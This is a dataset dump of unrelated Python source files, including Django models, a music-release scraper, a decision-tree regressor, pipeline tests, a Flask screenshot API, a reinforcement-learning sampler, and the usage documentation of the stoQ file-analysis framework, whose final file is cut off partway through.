content
stringlengths 5
1.05M
|
|---|
import numpy as np
from scipy.ndimage import imread as imread0
import tifffile as tiff
def imread_check_tiff(path):
img = imread0(path)
if img.dtype == 'object':
img = tiff.imread(path)
return img
def imread(path):
if isinstance(path, tuple) or isinstance(path, list):
st = []
for p in path:
st.append(imread_check_tiff(p))
img = np.dstack(st)
if img.shape[2] == 1:
np.squeeze(img, axis=2)
return img
else:
return imread_check_tiff(path)
|
"""Module containing the user entity"""
from django.db import models
from django.contrib.auth.models import (AbstractBaseUser, BaseUserManager)
from shared.base_model import BaseModel
class User(AbstractBaseUser, BaseModel):
"""Model for a user in the system"""
class Meta:
"""Class to add more information on user model"""
ordering = ('username', )
username = models.CharField(max_length=150, unique=True)
email = models.EmailField(max_length=150, unique=True)
password = models.CharField(max_length=100)
first_name = models.CharField(max_length=100, null=True, blank=True)
last_name = models.CharField(max_length=100, null=True, blank=True)
image_url = models.URLField(
default='https://res.cloudinary.com/health-id/image/upload/'
'v1554552278/Profile_Picture_Placeholder.png'
)
is_admin = models.BooleanField(default=False)
last_login = models.DateTimeField(auto_now=True)
USERNAME_FIELD = "email"
REQUIRED_FIELDS = []
def __str__(self):
return self.email
|
# TODO: feature - download music based on style & date | quantity
# TODO: construct more logical download tree with meta data
# TODO: open user's file explorer after download
# TODO: setup script
# TODO: add license and responsibilities
import os
import re
import datetime
import requests
import shutil
from bs4 import BeautifulSoup
def main():
print_header()
releases = get_user_selection_and_links()
print(releases)
download_selection(releases)
def print_header():
print('----------------------------------------')
print('--------RUPSY DOWNLOAD PROGRAM----------')
print('----------------------------------------')
def get_user_selection_and_links():
# download music based on artist selection
# TODO: add validation on input
artist_selection = input('What artist would you like releases from?\n')
# scrape site and get URLs for releases for artist
url = 'http://www.rupsy.ru/index.php'
host = 'www.rupsy.ru'
html = requests.get(url + '?id=4&search={0}'.format(artist_selection))
soup = BeautifulSoup(html.text, 'html.parser')
releases = soup.find_all('td', class_='rel')
release_list = []
for release in releases:
release_list.append((release.find('div', class_='rel_name').find('a').text,
host + release.find('div', style='text-align:center;').find('a')['href']))
return release_list
def download_selection(releases):
download_path = os.path.join(os.path.abspath(os.path.curdir), 'rupsy-downloads')
# check for folder and create rupsy-download folder if necessary
if not (os.path.isdir(download_path)):
os.makedirs(download_path)
# download releases
for release in releases:
# get download filename
rh = requests.head('http://' + release[1])
release_download_filename = release[0].replace(' ', '') + '.{0}'\
.format(rh.headers['Location'].split('.')[-1]).lower()
# create file if one doesn't exist
if not (os.path.isfile(os.path.join(download_path, release_download_filename))):
dir_fd = os.open(download_path, os.O_RDONLY)
def opener(path, flags):
return os.open(path, flags, dir_fd=dir_fd)
r = requests.get('http://' + release[1], stream=True)
print('Starting release download')
with open(release_download_filename, 'wb', opener=opener) as fd:
c = 0
for chunk in r.iter_content(1024):
if c % 1048576 == 0:
print('Downloaded 1MB of {0}...'.format(release[0]))
fd.write(chunk)
c += 1024
os.close(dir_fd) # don't leak a file descriptor
print('Finished downloading {0} to {1}'.format(release[0], download_path))
# unpacking zip if zip
if os.path.splitext(os.path.join(download_path, release_download_filename))[1] in ['.zip', '.tar']:
print('Unpacking compressed file for {0}'.format(release[0]))
shutil.unpack_archive(os.path.join(download_path, release_download_filename), extract_dir=download_path)
print('Successfully unpacked file. Deleting compressed source...')
os.remove(os.path.join(download_path, release_download_filename))
print('Done!')
else:
print('You already have downloaded {0}'.format(release[0]))
if __name__ == '__main__':
main()
|
import numpy as np
from ml_algorithms import utils
class DecisionTreeRegressorNode:
def __init__(self, score, num_samples, prediction):
self.score = score
self.num_samples = num_samples
self.prediction = prediction
self.feature_idx = 0
self.threshold = 0
self.left = None
self.right = None
class DecisionTreeRegressor:
def __init__(self, criterion='mse', max_depth=None):
self.criterion = criterion.lower()
self.depth = 0
self.n_features = 0
self.n_classes = 0
self.n_leaves = 0
self.tree = None
self.max_depth = max_depth
if self.criterion == 'mse':
self.prediction_fn = lambda x: np.mean(x)
self.score_fn = utils.mse_score
elif self.criterion == 'mae':
self.prediction_fn = lambda x: np.median(x)
self.score_fn = utils.mae_score
elif self.criterion == 'poisson':
self.prediction_fn = lambda x: np.mean(x)
self.score_fn = utils.poisson_score
else:
raise ValueError(f'invalid criterion: {criterion}')
def fit(self, X, y):
X = np.array(X)
y = np.array(y)
n, k = X.shape
self.n_classes = len(np.unique(y))
self.n_features = k
self.tree = self._build_tree(X, y)
return self.evaluate(X, y)
def _build_tree(self, X, y, depth=0):
n = len(y)
if n == 0:
return None
# the prediction is the mean/median of the data
prediction = self.prediction_fn(y)
# score = error(ground truth, prediction)
score = self.score_fn(y)
node = DecisionTreeRegressorNode(score=score, num_samples=n, prediction=prediction)
# keep splitting recursively until max depth
if not self.max_depth or depth < self.max_depth:
self.depth = max(depth, self.depth)
# find optimal split for node
feature_idx, threshold = self._split(X, y)
if feature_idx is not None:
# calculate left and right indices
idx_left = X[:, feature_idx] < threshold
idx_right = ~idx_left
# split to left and right nodes
X_left, y_left = X[idx_left], y[idx_left]
X_right, y_right = X[idx_right], y[idx_right]
# update node values
node.feature_idx = feature_idx
node.threshold = threshold
node.left = self._build_tree(X_left, y_left, depth + 1)
node.right = self._build_tree(X_right, y_right, depth + 1)
else:
# leaf node
self.n_leaves += 1
else:
# leaf node
self.n_leaves += 1
return node
def _split(self, X, y):
n = len(y)
if n <= 1:
return None, None
# the prediction is the mean/median of the data
prediction = self.prediction_fn(y)
# score = error(ground truth, prediction)
best_score = self.score_fn(y, prediction)
best_feature_idx, best_threshold = None, None
# loop through all features
for feature_idx in range(self.n_features):
# get current feature vector of all entries
feature = X[:, feature_idx]
# sorted feature vector is the thresholds
thresholds = np.sort(feature)
# loop through all possible split thresholds
for threshold in thresholds:
indices = feature < threshold
y_left = y[indices]
y_right = y[~indices]
prediction_left = self.prediction_fn(y_left)
prediction_right = self.prediction_fn(y_right)
# calculate score sum of left and right node scores
score_left = self.score_fn(y_left, prediction_left)
score_right = self.score_fn(y_right, prediction_right)
score = score_left + score_right
if score < best_score:
best_score = score
best_feature_idx = feature_idx
best_threshold = threshold
return best_feature_idx, best_threshold
def predict(self, X):
return np.array([self._predict_one(x) for x in X])
def _predict_one(self, x):
return self._predict_node(x).prediction
def _predict_node(self, x):
node = self.tree
while node.left:
if x[node.feature_idx] < node.threshold:
node = node.left
else:
node = node.right
return node
def evaluate(self, X, y):
y = np.array(y)
y_pred = self.predict(X)
# average score across all predictions
score = np.mean([self._predict_node(x).score] for x in X)
# r^2 score
r2 = utils.r2_score(y, y_pred)
return score, r2
|
"""
The MIT License (MIT)
Copyright (c) 2012, Florian Finkernagel <finkernagel@imt.uni-marburg.de>
Permission is hereby granted, free of charge, to any person obtaining a copy of
this software and associated documentation files (the "Software"), to deal in
the Software without restriction, including without limitation the rights to
use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies
of the Software, and to permit persons to whom the Software is furnished to do
so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
from pathlib import Path
import pytest
import pypipegraph as ppg
from .shared import write, read
@pytest.mark.usefixtures("new_pipegraph")
class TestPruning:
def test_basic_prune(self):
ppg.FileGeneratingJob("A", lambda: write("A", "A"))
b = ppg.FileGeneratingJob("B", lambda: write("B", "B"))
b.prune()
ppg.run_pipegraph()
assert Path("A").read_text() == "A"
assert not Path("B").exists()
def test_basic_prune2(self):
a = ppg.FileGeneratingJob("A", lambda: write("A", "A"))
b = ppg.FileGeneratingJob("B", lambda: write("B", "B"))
b.depends_on(a)
b.prune()
ppg.run_pipegraph()
assert Path("A").read_text() == "A"
assert not Path("B").exists()
def test_basic_prune3(self):
a = ppg.FileGeneratingJob("A", lambda: write("A", "A"))
b = ppg.FileGeneratingJob("B", lambda: write("B", "B"))
c = ppg.FileGeneratingJob("C", lambda: write("C", "C"))
d = ppg.FileGeneratingJob("D", lambda: write("D", "D"))
b.depends_on(a)
b.prune()
c.depends_on(b) # that is ok, pruning happens after complet build.
d.depends_on(a)
ppg.run_pipegraph()
assert Path("A").read_text() == "A"
assert Path("D").read_text() == "D"
assert not Path("B").exists()
assert not Path("C").exists()
assert c._pruned == b.job_id
def test_pruning_does_not_prune_final_jobs(self):
ppg.FileGeneratingJob("A", lambda: write("A", "A"))
b = ppg.FileGeneratingJob("B", lambda: write("B", "B"))
ppg.FinalJob("shu", lambda: write("C", "C"))
b.prune()
ppg.run_pipegraph()
assert Path("A").read_text() == "A"
assert Path("C").read_text() == "C"
assert not Path("B").exists()
def test_pruning_final_jobs_directly(self):
ppg.FileGeneratingJob("A", lambda: write("A", "A"))
ppg.FileGeneratingJob("B", lambda: write("B", "B"))
c = ppg.FinalJob("shu", lambda: write("C", "C"))
c.prune()
ppg.run_pipegraph()
assert Path("A").read_text() == "A"
assert Path("B").read_text() == "B"
assert not Path("C").exists()
def test_tempfile_not_run_on_prune(self):
a = ppg.TempFileGeneratingJob("A", lambda: write("A", "A"))
b = ppg.FileGeneratingJob("B", lambda: write("B", "B" + read("A")))
b.depends_on(a)
b.prune()
ppg.run_pipegraph()
assert not Path("B").exists()
assert not Path("A").exists()
def test_tempfile_still_run_if_needed_for_other(self):
a = ppg.TempFileGeneratingJob("A", lambda: write("A", "A"))
b = ppg.FileGeneratingJob("B", lambda: write("B", "B" + read("A")))
c = ppg.FileGeneratingJob("C", lambda: write("C", "C" + read("A")))
b.depends_on(a)
c.depends_on(a)
b.prune()
ppg.run_pipegraph()
assert not Path("B").exists()
assert Path("C").exists()
assert Path("C").read_text() == "CA"
assert not Path("A").exists()
|
import pandas as pd
#input and output the data
data=pd.read_csv('test.csv',header=0,index_col=0)
print(data)
print(type(data))
data.to_csv('testout.csv',encoding='utf-8-sig')
|
from django.conf.urls import patterns, url
from . import views
urlpatterns = patterns('',
url(r'^$', views.users, name='all'),
url(r'^(?P<user_id>\d+)/$', views.user, name='one'),
url(r'^(?P<user_id>\d+)/edit/$', views.edit_view, name='edit'),
)
|
"""
Generation of data cos it's tedius to do it by hand
"""
class Generator:
def __init__(self, num_datapoints: int):
self.n = num_datapoints
self.celcius = []
self.farenheight = []
def getData(self):
for i in range(self.n):
num = i * 2 + 1
self.celcius.append(num)
self.farenheight.append(num * 9 / 5 + 32)
return self.celcius, self.farenheight
|
#
# Copyright 2021 LinkedIn Corporation. All rights reserved. Licensed under the BSD-2 Clause license.
# See LICENSE in the project root for license information.
#
import os
controller = os.environ['HOROVOD_CONTROLLER']
operators = os.environ['HOROVOD_CPU_OPERATIONS']
timeout = os.environ['HOROVOD_GLOO_TIMEOUT_SECONDS']
rendez_port = os.environ['HOROVOD_GLOO_RENDEZVOUS_PORT']
rendez_addr = os.environ['HOROVOD_GLOO_RENDEZVOUS_ADDR']
cross_rank = os.environ['HOROVOD_CROSS_RANK']
cross_size = os.environ['HOROVOD_CROSS_SIZE']
local_rank = os.environ['HOROVOD_LOCAL_RANK']
local_size = os.environ['HOROVOD_LOCAL_SIZE']
size = os.environ['HOROVOD_SIZE']
rank = os.environ['HOROVOD_RANK']
hostname = os.environ['HOROVOD_HOSTNAME']
job_name = os.environ['JOB_NAME']
print('JOB_NAME is ' + job_name)
print('Horovod envs are as follows:')
print('controller: ' + controller)
print('operators: ' + operators)
print('timeout: ' + timeout)
print('rendez_port: ' + rendez_port)
print('rendez_addr: ' + rendez_addr)
print('cross_rank: ' + cross_rank)
print('cross_size: ' + cross_size)
print('local_rank: ' + local_rank)
print('local_size: ' + local_size)
print('size: ' + size)
print('rank: ' + rank)
print('hostname: ' + hostname)
if not (controller and job_name and operators and timeout and rendez_addr and rendez_port and cross_rank and cross_size and local_rank and local_size and size and rank):
raise ValueError
|
from flask import Blueprint
from flask_restful import Resource, Api
from App.models import HomeBanner
api = Api()
def init_api(app):
api.init_app(app=app)
class HomeResource(Resource):
def get(self):
homebanners = HomeBanner.query.all()
return {'msg':'ok'}
api.add_resource(HomeResource,'/home/')
|
from pydantic import BaseModel
from datetime import datetime
class BusStop(BaseModel):
id: int
message_text: str
city: str
created: datetime
creator_id: int
|
"""Configuration tests."""
import os
from gt4sd.configuration import (
GT4SDConfiguration,
get_algorithm_subdirectories_in_cache,
get_algorithm_subdirectories_with_s3,
)
gt4sd_configuration_instance = GT4SDConfiguration.get_instance()
def test_default_local_cache_path():
if "GT4SD_LOCAL_CACHE_PATH" not in os.environ:
assert os.path.dirname(
gt4sd_configuration_instance.gt4sd_local_cache_path
) == os.path.expanduser("~")
assert (
os.path.basename(gt4sd_configuration_instance.gt4sd_local_cache_path)
== ".gt4sd"
)
else:
assert (
gt4sd_configuration_instance.gt4sd_local_cache_path
== os.environ["GT4SD_LOCAL_CACHE_PATH"]
)
def test_get_algorithm_subdirectories_with_s3():
assert isinstance(get_algorithm_subdirectories_with_s3(), set)
def test_get_algorithm_subdirectories_in_cache():
assert isinstance(get_algorithm_subdirectories_in_cache(), set)
|
#
# Cole Smith
# Restaurant Closure Engine
# BDS - Undergraduate
# prediction.py
#
# Cluster generation routines for latent restaurant segmentation
#
from sklearn.decomposition import PCA
from src.preprocessing.fetch import fetch_restaurant_inspection_data
from src.preprocessing.transform import min_max_scale_values
# NOT IMPLEMENTED: Not practical since this information
# is grouped by DATE and zip code.
# def pca_on_master_file(n=3):
# """
# Performs a PCA decomposition on the
# master dataset (as defined in merge.py)
#
# :param n: The number of dimensions to keep
# :return: `Numpy Matrix, Labels Array`
# """
# pass
def pca_on_restaurant_inspections_file(n=3, y='is_closed'):
"""
Performs a PCA decomposition on the
restaurant inspections dataset (as defined in
fetch.py)
:param n: The number of dimensions to keep
:param y: The name of the prediction col (to color)
:return: `Numpy Matrix, Labels Array`
"""
print("[ INF ] Beginning Restaurant Violation PCA")
print("[ INF ] Fetching...")
df = fetch_restaurant_inspection_data().dropna()
colors = df[y]
df = df.drop(y, 1)
# Drop other unneeded columns
drop_list = ['camis', 'dba', 'boro', 'building', 'street', 'zip', 'phone',
'inspection_year', 'inspection_month', 'inspection_day',
'violation_ratio', 'cuisine_description']
df = df.drop(drop_list, 1)
# Pivot cuisine
# cuisines = pd.get_dummies(df['cuisine_description'], prefix='cuisine')
# df = df.join(cuisines).drop('cuisine_description', 1)
df = min_max_scale_values(df, None)
# Create PCA representation
print("[ INF ] Beginning PCA Decomposition: N =", n)
pca = PCA(n_components=n).fit_transform(df)
print("[ INF ] Done.")
return pca, colors
|
import numpy as np
import warnings
from digideep.agent.sampler_common import Compose, flatten_memory_to_train_key, get_memory_params, check_nan, check_shape, check_stats, print_line
from digideep.agent.sampler_common import flatten_first_two
from digideep.utility.logging import logger
from digideep.utility.profiling import KeepTime
def get_sample_memory(memory, info):
"""Sampler function for DDPG-like algorithms where we want to sample data from an experience replay buffer.
This function adds the following key to the buffer:
* ``/observations_2``
Returns:
dict: One sampled batch to be used in the DDPG algorithm for one step of training. The shape of each
key in the output batch will be: ``(batch_size, *key_shape[2:])``
"""
# Get information from info
batch_size = info["batch_size"]
observation_path = info["observation_path"]
# Whether to use CER or not:
# use_cer = info.get("use_cer", False)
# Get the main data from the memory
buffer = memory.get_buffer()
# Get some constants from the memory
num_workers = memory.get_num_batches()
# num_records = memory.length * num_workers
N = memory.get_last_trans_index() - 1 # We don't want to consider the last "incomplete" record, hence "-1"
record_arr = memory.get_index_valid_elements()
worker_arr = np.arange(0, num_workers)
num_records = len(record_arr) * num_workers
# with KeepTime("mask_array"):
# masks_arr = buffer["/masks"][:,record_arr]
# masks_arr = masks_arr.reshape(-1)
if batch_size >= num_records:
# We don't have enough data in the memory yet.
logger.debug("batch_size ({}) should be smaller than total number of records (~ {}={}x{}).".format(batch_size, num_records, num_workers, len(record_arr)))
return None
with KeepTime("sampling_by_choice"):
# if use_cer:
# last_chunk_indices = memory.get_index_valid_last_chunk()
# available_batch_size = len(last_chunk_indices) * num_workers
# if available_batch_size <= batch_size:
# # We have selected a few transitions from previous step.
# # Now, we should sample the rest from the replay buffer.
# sample_record_recent = np.repeat(last_chunk_indices, num_workers) # 10 10 10 10 11 11 11 11 ...
# sample_worker_recent = np.tile(worker_arr, len(last_chunk_indices)) # 0 1 2 3 0 1 2 3 ...
#
# batch_size_prime = batch_size - available_batch_size
#
# # Select the rest ...
# sample_record_prime = np.random.choice(record_arr, batch_size_prime, replace=True)
# sample_worker_prime = np.random.choice(worker_arr, batch_size_prime, replace=True)
#
# # Combine
# sample_record = np.concatenate([sample_record_recent, sample_record_prime])
# sample_worker = np.concatenate([sample_worker_recent, sample_worker_prime])
# else:
#
# # OK, we have enough data, so no sampling!
# logger.warn("CER: Latest transitions greater than batch size. Sample from last transitions.")
#
# sample_record = np.random.choice(last_chunk_indices, batch_size, replace=True)
# sample_worker = np.random.choice(worker_arr, batch_size, replace=True)
#
# else:
# NOTE: NEVER ever use sampling WITHOUT replacement: Its time scales up with the array size.
# Sampling with replacement:
sample_record = np.random.choice(record_arr, batch_size, replace=True)
sample_worker = np.random.choice(worker_arr, batch_size, replace=True)
# Move the next step samples
sample_record_2 = memory.get_index_move_n_steps(sample_record, 1)
# Make a table of indices to extract transitions
sample_tabular = [[sample_worker], [sample_record]]
sample_tabular_2 = [[sample_worker], [sample_record_2]]
with KeepTime("tabular_index_extraction"):
# Extracting the indices
batch = {}
for key in buffer:
batch[key] = buffer[key][sample_tabular[0],sample_tabular[1]]
with KeepTime("post_key_generation"):
observation_path = "/observations" + observation_path
# Adding predictive keys
batch[observation_path+"_2"] = buffer[observation_path][sample_tabular_2[0],sample_tabular_2[1]]
with KeepTime("flatten_first_two"):
batch = flatten_first_two(batch)
return batch
#############################
### Composing the sampler ###
#############################
# Sampler with replay buffer
sampler_re = Compose([flatten_memory_to_train_key, # Must be present: It flattens the memory dict to the "train" key.
# get_memory_params, # Must be present: It gets the memory parameters and passes them to the rest of functions through "info".
get_sample_memory, # Sample
# check_shape, # It prints the shapes of the existing keys in the chunk.
# check_nan, # It complains about existing NaNs in the chunk.
# check_stats,
# print_line, # This only prints a line for more beautiful debugging.
])
|
from model.contact import Contact
def test_edit_first_contact(app):
if app.contact.count() == 0:
app.contact.create(Contact(firstname ="firstname"))
old_contacts = app.contact.get_contact_list()
contact = Contact(firstname="TEST")
contact.id = old_contacts[0].id
contact.lastname = old_contacts[0].lastname
app.contact.edit_first_contact(contact)
new_contacts = app.contact.get_contact_list()
assert len(old_contacts) == len(new_contacts)
old_contacts[0] = contact
assert sorted(old_contacts, key=Contact.id_or_max) == sorted(new_contacts, key=Contact.id_or_max)
|
import json
import threading
import time
from flask import Flask, request, make_response, jsonify
from flask_restplus import Api, Resource, fields
from pub import take_screenshot, RuntimeException, get_image_exists
app = Flask("get-screenshot")
api = Api(app=app)
namespace = api.namespace("/", description="Screenshot as a Service")
URL = "url"
POST = "POST"
URLS = "urls"
@api.errorhandler(RuntimeException)
def handle_invalid_usage(error):
return {'message': error.message}, 400
@namespace.route("/screenshot")
class Screenshot(Resource):
resource_fields = api.model('Screenshot', {
'url': fields.Url,
})
@api.expect(resource_fields)
def post(self):
if request.method == POST and not request.is_json:
return "not json", 400
rjson = request.json
# check if it's a list or one link
if URL not in rjson.keys():
return jsonify({"message": "invalid request"}), 400
# take screenshot
url = rjson[URL]
ret = take_screenshot(url)
# ret is a link: return
if "url" in ret.keys():
return jsonify({"screenshot": ret["url"]})
# wait for screenshot
for i in range(10):
link = get_image_exists(ret["hash"])
if len(link) > 0:
break
time.sleep(0.01)
return jsonify({"screenshot": link})
@namespace.route("/screenshots")
class Screenshots(Resource):
resource_fields = api.model('Screenshots', {
'urls': fields.Url,
})
@api.expect(resource_fields)
def post(self):
if request.method == POST and not request.is_json:
return "not json", 400
rjson = request.json
# check if it's a list or one link
if URLS not in rjson.keys():
return jsonify({"message": "invalid request"}), 400
# multiple links: split list, report if some error is found, return with a list
if URLS in rjson:
screenshots = []
urls = rjson.get(URLS).split(";")
if len(urls) == 0:
return jsonify({"message": "expected urls separated by ;"}), 400
for url in urls:
screenshots.append({url: take_screenshot(url)})
return jsonify({"screenshots": screenshots})
return jsonify({"message": "invalid request"}), 400
|
# Copyright 2014-2018 PUNCH Cyber Analytics Group
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
.. _stoqoverview:
Overview
========
`stoQ` is an extremely flexible framework. In this section we will go over some of
the most advanced uses and show examples of how it can be used as a framework.
.. _framework:
Framework
=========
stoQ is much more than simply a command to be run. First and foremost, stoQ is a
framework. The command `stoq` is simply a means of interacting with the framework.
For more detailed and robust information on APIs available for stoQ, please check
out the :ref:`plugin documentation <pluginoverview>`.
``Stoq`` is the primary class for interacting with `stoQ` and its plugins.
All arguments, except for plugins to be used, must be defined upon instantiation.
Plugins can be loaded at any time. However, to ensure consistent behavior, it is
recommended that all required plugins be loaded upon instantiation.
For these examples, it is assumed the below :ref:`plugins have been installed <installplugins>` in
`$CWD/plugins`:
- dirmon
- exif
- filedir
- hash
- yara
.. _individualscan:
Individual Scan
---------------
Individual scans are useful for scanning single payloads at a time. The user is
responsible for ensuring a payload is passed to the ``Stoq`` class.
.. note:: ``Provider`` plugins are ignored when conducting an individual scan.
1. First, import the required class:
>>> import asyncio
>>> from stoq import Stoq, RequestMeta
2. We will now define the plugins we want to use. In this case, we will be
loading the ``hash``, and ``exif`` plugins:
>>> workers = ['hash', 'exif']
3. Now that we have our environment defined, lets instantiate the ``Stoq`` class:
>>> s = Stoq(always_dispatch=workers)
4. We can now load a payload, and scan it individually with `stoQ`:
>>> src = '/tmp/bad.exe'
>>> loop = asyncio.get_event_loop()
>>> with open(src, 'rb') as src_payload:
... meta = RequestMeta(extra_data={'filename': src})
... results = loop.run_until_complete(s.scan(
... content=src_payload.read(),
... request_meta=meta))
>>> print(results)
... {
... "time": "...",
... "results": [
... {
... "payload_id": "...",
... "size": 507904,
... "payload_meta": {
... "should_archive": true,
... "extra_data": {
... "filename": "/tmp/bad.exe"
... },
... "dispatch_to": []
... },
... "workers": {
... "hash": {
... [...]
.. _providerscan:
Using Providers
---------------
Using stoQ with providers allows for the scanning of multiple payloads from
multiple sources. This method will instantiate a `Queue` which payloads
are published to for scanning by `stoQ`. Additionally, payloads may be
retrieved from multiple disparate data sources using `Archiver` plugins.
1. First, import the required class:
>>> import asyncio
>>> from stoq import Stoq
2. We will now define the plugins we want to use. In this case, we will be
loading the ``dirmon``, ``filedir``, ``hash``, and ``exif`` plugins. We
will also set the ``base_dir`` to a specific directory. Additionally,
we will also set some plugin options to ensure the plugins are
operating the way we'd like them:
>>> always_dispatch = ['hash']
>>> providers = ['dirmon']
>>> connectors = ['filedir']
>>> dispatchers = ['yara']
>>> plugin_opts = {
... 'dirmon': {'source_dir': '/tmp/datadump'},
... 'filedir': {'results_dir': '/tmp/stoq-results'}
... }
>>> base_dir = '/usr/local/stoq'
>>> plugin_dirs = ['/opt/plugins']
.. note:: Any plugin options available in the plugin's ``.stoq`` configuration
file can be set via the ``plugin_opts`` argument.
3. Now that we have our environment defined, lets instantiate the ``Stoq`` class,
and run:
>>> s = Stoq(
... base_dir=base_dir,
... plugin_dir_list=plugin_dirs,
... dispatchers=dispatchers,
... providers=providers,
... connectors=connectors,
... plugins_opts=plugins_opts,
... always_dispatch=always_dispatch
... )
>>> loop = asyncio.get_event_loop()
>>> loop.run_until_complete(s.run())
A few things are happening here:
#. The ``/tmp/datadump`` directory is being monitored for newly created files
#. Each file is opened, and the payload is loaded into ``Stoq`` asynchronously
#. The payload is scanned with the ``yara`` dispatcher plugin
#. The yara dispatcher plugin returns a list of plugins that the payload should
be scanned with
#. The plugins identified by the ``yara`` dispatcher are loaded, and the payload is
sent to them
#. Each payload will always be sent to the ``hash`` plugin because it was defined
in ``always_dispatch``
#. The results from all plugins are collected, and sent to the ``filedir``
connector plugin
#. The ``filedir`` plugin saves each result to disk in ``/tmp/stoq-results``
.. _manualscan:
Manual Interaction
==================
``Stoq`` may also be interacted with manually, rather than relying on the normal workflow.
In this section, we will touch on how this can be done.
Instantiating stoQ
------------------
Let's start by simply instantiating ``Stoq`` with no options. There are several arguments
available when instantiating ``Stoq``, please refer to the :ref:`plugin documentation <pluginoverview>`
for more information and options available.:
>>> from stoq import Stoq
>>> s = Stoq()
Loading plugins
---------------
`stoQ` plugins can be loaded using a simple helper function. The framework will
automatically detect the type of plugin is it based on the ``class`` of the plugin.
There is no need to define the plugin type, `stoQ` will handle that once it is loaded.:
>>> plugin = s.load_plugin('yara')
Instantiate Payload Object
--------------------------
In order to scan a payload, a ``Payload`` object must first be instantiated. The
``Payload`` object houses all information related to a payload, to include the
content of the payload and metadata (i.e., size, originating plugin information,
dispatch metadata, among others) pertaining to the payload. Optionally, a ``Payload``
object can be instantiated with a ``PayloadMeta`` object to ensure the originating
metadata (i.e., filename, source path, etc...) is also made available:
>>> import os
>>> import asyncio
>>> from stoq.data_classes import PayloadMeta, Payload
>>> filename = '/tmp/test_file.exe'
>>> with open(filename, 'rb') as src:
... meta = PayloadMeta(
... extra_data={
... 'filename': os.path.basename(filename),
... 'source_dir': os.path.dirname(filename),
... }
... )
>>> payload = Payload(src.read(), meta)
Scan payload
------------
There are two helper functions available for scanning a payload. If a dispatcher
plugin is not being used, then a worker plugin must be defined by passing the
``add_start_dispatch`` argument. This tells `stoQ` to send the ``Payload`` object
to the specified worker plugins.
From raw bytes
^^^^^^^^^^^^^^
If a `Payload` object has not been created yet, the content of the raw payload can
simply be passed to the `Stoq.scan` function. A ``Payload`` object will automatically
be created.:
>>> loop = asyncio.get_event_loop()
>>> start_dispatch = ['yara']
>>> results = loop.run_until_complete(
... s.scan('raw bytes', add_start_dispatch=start_dispatch)
... )
From ``Payload`` object
^^^^^^^^^^^^^^^^^^^^^^^
If a ``Payload`` object has already been instantiated, as detailed above, the
``scan_request`` function may be called. First, a new `Request` object must
be instantiated with the `Payload` object that we previously created:
>>> import asyncio
>>> from stoq import Payload, Request, RequestMeta
>>> start_dispatch = ['yara']
>>> loop = asyncio.get_event_loop()
>>> payload = Payload(b'content to scan')
>>> request = Request(payloads=[payload], request_meta=RequestMeta())
>>> results = loop.run_until_complete(
... s.scan_request(request, add_start_dispatch=start_dispatch)
... )
Save Results
------------
Finally, results may be saved using the desired ``Connector`` plugin. `stoQ` stores
results from the framework as a ``StoqResponse`` object. The results will be saved
to all connector plugins that have been loaded. In this example, we will only load
the ``filedir`` plugin which will save the results to a specified directory.:
>>> connector = s.load_plugin('filedir')
>>> loop.run_until_complete(connector.save(results))
Split Results
-------------
In some cases it may be required to split results out individually. For example, when
saving results to different indexes depending on plugin name, such as with ElasticSearch or Splunk.
>>> results = loop.run_until_complete(s.scan(payload))
>>> split_results = results.split()
Reconstructing Subresponse Results
----------------------------------
stoQ can produce complex results depending on the recursion depth and extracted payload objects.
In order to help handle complex results and limit redundant processing of payloads when using
stoQ as a framework, a method exists that will allow for iterating over each result as if it
were the original root object. This is especially useful when handling compressed archives, such
as `zip` or `apk` files that may have multiple levels of archived content. Additionally, the
defined decorators will be run against each newly constructed `StoqResponse` and added to the
results.
>>> await for result in s.reconstruct_all_subresponses(results):
... print(result)
Below is a simple flow diagram of the iterated results when being reconstructed.
.. image:: /_static/reconstruct-results.png
.. _multiplugindir:
Multiple Plugin directories
===========================
When instantiating ``Stoq``, multiple plugins directories may be defined. For more
information on default paths, please refer to the :ref:`getting started documentation <stoqhome>`::
>>> from stoq import Stoq
>>> plugin_directories = ['/usr/local/stoq/plugins', '/home/.stoq/plugins']
>>> s = Stoq(plugin_dir_list=plugin_directories)
API
===
"""
import os
import asyncio
import logging
import configparser
from collections import defaultdict
from pythonjsonlogger import jsonlogger # type: ignore
from logging.handlers import RotatingFileHandler
from typing import (
AsyncGenerator,
Awaitable,
Coroutine,
DefaultDict,
Dict,
List,
Optional,
Set,
Tuple,
Union,
)
import stoq.helpers as helpers
from stoq.utils import ratelimited
from stoq.exceptions import StoqException
from stoq.plugin_manager import StoqPluginManager
from stoq.data_classes import (
ArchiverResponse,
DecoratorResponse,
DispatcherResponse,
Error,
ExtractedPayload,
Payload,
PayloadMeta,
PayloadResults,
Request,
RequestMeta,
StoqResponse,
WorkerResponse,
)
from stoq.plugins import (
ArchiverPlugin,
ConnectorPlugin,
DecoratorPlugin,
DispatcherPlugin,
WorkerPlugin,
)
# Created to enable `None' as a valid paramater
_UNSET = object()
class Stoq(StoqPluginManager):
def __init__(
self,
base_dir: Optional[str] = None,
config_file: Optional[str] = None,
log_dir: Optional[Union[str, object]] = _UNSET,
log_level: Optional[str] = None,
plugin_dir_list: Optional[List[str]] = None,
plugin_opts: Optional[Dict[str, Dict]] = None,
providers: Optional[List[str]] = None,
provider_consumers: Optional[int] = None,
source_archivers: Optional[List[str]] = None,
dest_archivers: Optional[List[str]] = None,
connectors: Optional[List[str]] = None,
dispatchers: Optional[List[str]] = None,
decorators: Optional[List[str]] = None,
